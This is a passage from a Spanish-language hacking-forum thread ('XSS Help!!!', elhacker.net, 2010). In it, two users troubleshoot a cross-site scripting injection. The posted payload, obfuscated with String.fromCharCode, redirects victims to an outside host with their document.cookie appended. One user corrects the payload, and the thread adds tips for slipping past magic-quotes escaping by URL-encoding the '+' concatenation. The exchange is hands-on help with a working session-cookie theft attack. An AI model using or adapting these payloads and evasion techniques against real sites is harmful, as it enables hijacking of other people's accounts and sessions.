elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 03:58  


Tema destacado: Suscripción al boletín mensual de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  XSS Help!!!		 0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: XSS Help!!!  (Leído 3,009 veces)
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #15 en: 10 Febrero 2010, 23:09 »
No funciona tio

con el code tratat de agregarle el + document.cookie; al ejemplo que me diste a ver si te junciona.

Gracias
En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #16 en: 10 Febrero 2010, 23:14 »
No te lo puedo agregar correctamente porque no se la direccion de tu web, pon lo que pusistee y miro que hiziste mal
En línea
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #17 en: 10 Febrero 2010, 23:16 »
"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 115, 99, 114, 105, 112, 116, 62))</script>


esto fue lo que puse y no salio nada
En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #18 en: 10 Febrero 2010, 23:38 »
Bueno este debe funcionar:
Código:
"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>
En línea
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #19 en: 10 Febrero 2010, 23:49 »
Ya mucha gracias lo hice con unicode para la url y me funciono perfectamente jijiji
En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #20 en: 10 Febrero 2010, 23:59 »
Ok, no pasa nada, pero yo creo que se porque no podias hacerlo, ps pueda ser que el servidor tuviera On las magic quotes gpc que te escapaba las comillas dobles y simples por barras invertidas, siempre trata de ver el codigo de fuente y mira que pasa con lo que vas inyectando.
En línea
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS Help!!!
« Respuesta #21 en: 11 Febrero 2010, 00:26 »
yo lo prove concatenando el la url + el cookie
de este manera

"miurl.com"+document.cookie;
y despues probe

"miurl.com"%2bdocument.cookie; y asi si funciona!
es por el magic quote. gracias no mantenemos en conctato!
En línea
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: XSS Help!!!
« Respuesta #22 en: 11 Febrero 2010, 00:31 »
Bueno tambien, eso se llama url encoding, pero si alguna vez en cuentra otro XSS y no te funciona encodear la url por, ps te toca usar String.fromCharCode()
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines